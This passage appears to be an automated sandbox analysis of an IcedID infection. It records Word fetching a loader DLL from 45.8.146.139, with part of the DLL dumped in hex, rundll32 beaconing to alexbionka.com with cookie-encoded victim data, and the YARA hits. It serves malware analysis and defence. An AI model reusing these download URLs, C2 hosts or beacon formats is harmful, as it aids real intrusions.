    Aug 11, 2022 17:38:27.005193949 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005201101 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005234003 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005240917 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005266905 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005290985 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005306005 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005315065 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005341053 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005352020 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005378962 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005417109 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005462885 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005462885 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005490065 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005515099 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005522966 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005537033 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005578995 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005594969 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005620956 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005630970 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005659103 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005660057 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005692959 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005705118 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005729914 CEST804917345.8.146.139192.168.2.22
    Aug 11, 2022 17:38:27.005755901 CEST4917380192.168.2.2245.8.146.139
    Aug 11, 2022 17:38:27.005764008 CEST4917380192.168.2.2245.8.146.139
    TimestampSource PortDest PortSource IPDest IP
    Aug 11, 2022 17:38:36.178013086 CEST5586853192.168.2.228.8.8.8
    Aug 11, 2022 17:38:36.195198059 CEST53558688.8.8.8192.168.2.22
    Aug 11, 2022 17:38:36.213418007 CEST4968853192.168.2.228.8.8.8
    Aug 11, 2022 17:38:36.233592987 CEST53496888.8.8.8192.168.2.22
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Aug 11, 2022 17:38:36.178013086 CEST192.168.2.228.8.8.80x26e4Standard query (0)alexbionka.comA (IP address)IN (0x0001)
    Aug 11, 2022 17:38:36.213418007 CEST192.168.2.228.8.8.80xa642Standard query (0)alexbionka.comA (IP address)IN (0x0001)
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Aug 11, 2022 17:38:36.195198059 CEST8.8.8.8192.168.2.220x26e4No error (0)alexbionka.com64.227.108.27A (IP address)IN (0x0001)
    Aug 11, 2022 17:38:36.233592987 CEST8.8.8.8192.168.2.220xa642No error (0)alexbionka.com64.227.108.27A (IP address)IN (0x0001)
    • 45.8.146.139
    • alexbionka.com
    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.224917345.8.146.13980C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    TimestampkBytes transferredDirectionData
    Aug 11, 2022 17:38:26.663358927 CEST0OUTGET /fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 45.8.146.139
    Connection: Keep-Alive
    Aug 11, 2022 17:38:26.792161942 CEST2INHTTP/1.1 200 OK
    Date: Thu, 11 Aug 2022 15:38:26 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
    X-Powered-By: PHP/7.2.34
    Content-Description: File Transfer
    Content-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n14.dll"
    Expires: 0
    Cache-Control: must-revalidate
    Pragma: public
    Content-Length: 360448
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 0a 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U4ZZZYZYZZ3ZjXZRichZPEdYb" x`}.textwx `.rdata}|@@.rsrc~@@


    Session IDSource IPSource PortDestination IPDestination PortProcess
    1192.168.2.224917464.227.108.2780C:\Windows\System32\rundll32.exe
    TimestampkBytes transferredDirectionData
    Aug 11, 2022 17:38:36.435995102 CEST384OUTGET / HTTP/1.1
    Connection: Keep-Alive
    Cookie: __gads=3570055661:1:6727:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323834393932:416C627573:31463945303738373942323239343237; __io=0; _gid=67AFEDC5AC03
    Host: alexbionka.com
    Aug 11, 2022 17:38:37.107072115 CEST384INHTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 11 Aug 2022 15:38:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0


    Click to jump to process

    Target ID:1
    Start time:17:38:18
    Start date:11/08/2022
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13f440000
    File size:1423704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Target ID:4
    Start time:17:38:28
    Start date:11/08/2022
    Path:C:\Users\user\AppData\Local\Temp\r9093.tmp.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Imagebase:0x760000
    File size:44544 bytes
    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Antivirus matches:
    • Detection: 0%, Metadefender, Browse
    • Detection: 0%, ReversingLabs
    Reputation:high

    Target ID:5
    Start time:17:38:29
    Start date:11/08/2022
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:"C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1
    Imagebase:0xffe40000
    File size:45568 bytes
    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Yara matches:
    • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
    • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
    • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
    Reputation:high

    No disassembly